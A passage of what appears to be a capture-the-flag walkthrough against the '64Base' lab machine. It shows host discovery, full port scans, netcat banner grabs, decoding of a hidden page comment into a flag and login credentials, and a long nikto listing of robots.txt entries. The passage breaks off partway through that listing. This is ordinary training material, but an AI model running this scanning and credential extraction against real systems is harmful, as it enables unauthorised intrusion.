# 64Base: 1.0.1 1. Check the IP $ netdiscover -i eth1 -r 192.168.56.1/24 Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:00 1 60 Unknown vendor 192.168.56.100 08:00:27:75:bc:c5 1 60 PCS Systemtechnik GmbH 192.168.56.103 08:00:27:68:e7:f8 1 60 PCS Systemtechnik GmbH => IP is 192.168.56.103 2. Nmap Scan the target $ nmap -p- -O -sS -T4 192.168.56.103 Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-14 23:27 CET Nmap scan report for 192.168.56.103 Host is up (0.00039s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 4899/tcp open radmin 62964/tcp open unknown MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.13 seconds => Found 4 services: - SSH on 22 - HTTP on 80 - radmin on 4899 - ??? on 62964 3. check SSH version $ nc 192.168.56.103 22 The programs included with the Fedora GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001 # => Seem to be fake (check IP) 4. check ??? $ nc 192.168.56.103 62964 SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 => Seem to be the correct SSH port 5. check radmin port $ nc 192.168.56.103 4899 ... So.. You found a way in then... but, can you pop root? /~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________ => Seem to be fake too 6. check HTTP port $ curl http://192.168.56.103/ 64base

64base


dmlldyBzb3VyY2UgO0QK

=> Seem to be legitimate => Show a hex comment 7. Decode the comment $ echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a" | xxd -r -p ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg== $ echo "ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==" | base64 -d flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==} => Got flag1! => $ echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 => Got User/password for something 8. Crawl site with cewl to create wordlist and check robots.txt $ cewl http://192.168.56.103/ > wordlist $ wget http://192.168.56.103/robots.txt 9. Run nikto to check robots nikto -host http://192.168.56.103 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.103 + Target Hostname: 192.168.56.103 + Target Port: 80 + Start Time: 2016-12-14 23:41:29 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/88888888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/88888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/c3P08P/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/C3p0/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/A280/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/above/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/AC1/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/across/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/activation/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Adjustments/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/after/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/against/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ago/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/air/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Air/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/aliens/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/All/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/allies/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/and/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Arcade/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/are/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Area/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Armament/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/armies/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/armour/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/arsenal/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Art/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/as/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Ascii/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Assassin/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/assault/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Assault/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/assaults/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Astromech/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/AT-AT/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/AT-ST/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/attacks/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Aural/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/away/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/awesome/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/b/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/B/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/back-/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Barracks/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/base/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Base/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bases/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Battle/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bay/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bays/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Beam/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/become/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/been/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/beneath/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bike/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/BioTronics/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bipedal/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/bizarre/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Blast/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/BlasTech/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Blaster/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Block/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/bomber/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bomber/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/bombers/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/bone/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Bounty/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Brain/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/burns/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/by/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/C/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ca-/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ceiling/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/chasing/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Chutes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/civil/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Class/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Collection/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/command/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Commander/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Computer/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/conflict/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Connecting/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/control/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Control/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Controls/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Cooling/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/courage/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Cybot/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/d/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/D/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/d88b/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/d88P/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/d8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/d8P/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/dark/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/DeathStar/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Deck/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/deflector/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Destroyer/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/destruction/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Detention/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/devices/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/diplomatic/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Diplomatic/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Dismantle/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/DL-18/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/DL-44/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Docking/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Doors/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Drive/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Droid/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Droids/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/e/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/E/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/efficient/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Empire/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/equipped/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/escaped/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/every/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/evil/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/extremely/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/f/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/famous/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/fantastic/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/far/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/faster/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/fear/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Fear/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Fighter/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/fighters/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/fire/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/first-shot/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/five/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Five/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Fixed/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/flaming/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Fleet/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/fleets/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/following/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/for/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/for-/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Force/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/forces/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/freedom/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/from/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/front/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/g/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/G/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Galactic/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Galactica/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/galaxy/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Gallery/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/garrison/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/great/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ground/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/group/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/guard/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Guard/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Han/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Hanger/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/has/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/have/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/heavily-armoured/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Heavy/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/heroes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/HH/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/HHH/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/HHHHH/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/HHHHHHHHHHHHHH/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/high/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/hope/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/houses/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/humans/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Imperial/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/individual/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/initial/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/instituted/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/intelligent/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Interrogation/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Intruder/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/is/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/issued/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/It/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/its/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/j8PY8i/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/keeps/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/kill/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/killing/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/known/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Kuat/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/l/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/L/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Labs/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Landing/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Laser/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Launch/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Lennert/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/level/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/levels/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Lever/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Light/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/line/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ll/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/located/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/long/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/longer/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/LS/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Luke/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/M/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/machi-/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/machine/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/made/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/magical/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Maintenance/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Medical/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Meeting/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/members/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Merr-Sonn/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/meters/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/MilleniumFalconSide/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/MilleniumFalconTop/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Miscellaneous/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/mission/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Mission/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Monitors/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/monster/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/monsters/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/motivator/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/multi-function/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/mystical/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/n/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/nel/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/nery/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Neutronic/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/New/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/nn/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/no/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/o/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/o--/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/O/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/o8/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/o88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/occupational/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/of/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Offices/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/on/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/On/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/only/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/oo/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/OO/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/OOO/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/OOOOO/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/oppression/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/or/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/order/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Order/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/outgunned/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Outnumbered/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/overwhelming/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/pable/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/pacity/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Pack/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Parking/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Person-/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/personnel/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Pilots/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/pistol/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Pistol/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/planet/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Platform/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/power/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Power/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/powerful/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/pre-fabricated/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/primary/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/prime/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Probe/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/process/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/programming/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/protect/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/prototypes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Quarters/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/rack/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/racks/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Radar/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/rag-tag/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Ramp/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ratio/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/reaches/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Rebellion/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Rebels/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Reception/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Recreation/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/reflexes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/reign/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Release/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/renowned/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Repair/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Rifle/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Rifles/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/risen/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Room/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/rooms/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Rooms/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/same/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Science/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Scout/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Security/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Sensor/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Sensors/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Service/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Setting/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/shadow/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Shield/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/SHIELD/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/shields/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ships/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Shops/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Shuttle/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Sienar/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Sight/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/single/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/smuggler/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Solo/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/space/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Space/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Speeder/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Spy-Eye/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/staff/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/standard-design/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Star/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Station/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Stock/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Storage/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Stormtrooper/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/strange/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Stun/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Suite/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/surface/' in robots.txt returned a non-forbidden or redirect HTTP 